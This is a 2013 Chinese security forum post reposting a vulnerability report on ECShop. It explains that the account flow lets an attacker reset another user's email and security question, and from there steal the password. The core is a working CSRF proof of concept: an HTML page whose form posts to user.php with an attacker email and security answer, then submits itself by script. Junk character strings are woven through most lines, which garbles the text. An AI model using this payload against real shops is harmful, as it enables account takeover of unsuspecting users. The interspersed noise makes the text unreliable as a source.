找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1815|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
3 w$ }2 v; T! w6 i( |ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现7 p! D3 Y% V6 n6 o, O: o$ C+ P
6 r& d3 j2 D7 E: g1 f
Demo For:http://www.wooyun.org/bug.php?action=view&id=3952 h3 T3 t$ m2 C( }/ Q4 h& Z

8 d. ?8 c# q, D详细说明:
. C" A* g4 t5 t  G' o利用csrf和xss可以突破官方所说的“障碍”2 n& u& D6 V+ g9 r2 b9 Q% g
xss版本已经有人说明
! _% G9 ^1 i% f3 p( s这里给出csrf版本" p5 l- \2 D4 m; d. N0 c& _

) C# U% x7 M- V7 [漏洞证明:
! g! G* q$ g- N6 q<html>
4 z$ A- E  r* K2 b. W6 Y<body>
8 j' n8 r1 r/ }+ A2 T- M<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
% O+ m$ [# W( P- F, f<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">: h+ ^* u* y' x
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
0 r# B. O% I" B  O9 K' j<INPUT TYPE="text" NAME="sel_question" value="ecshop">
& d- `+ k6 ]1 e. S  k$ a, @# C<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
" J, b4 |' D' E</body>
) C& o1 C' Z) \6 B0 k<script>9 Q& B. h* h1 @  d9 j
document.forms[0].submit();1 z8 s5 G7 L3 h7 R5 ^3 A- V- _" M
</script>9 l  ?" D4 T# D+ b
</html>$ C3 p- t: {9 W, p) g
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
: S9 D2 ]0 ~: t/ o# _
. V* u# ]' Y9 ]3 h7 R1 p
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表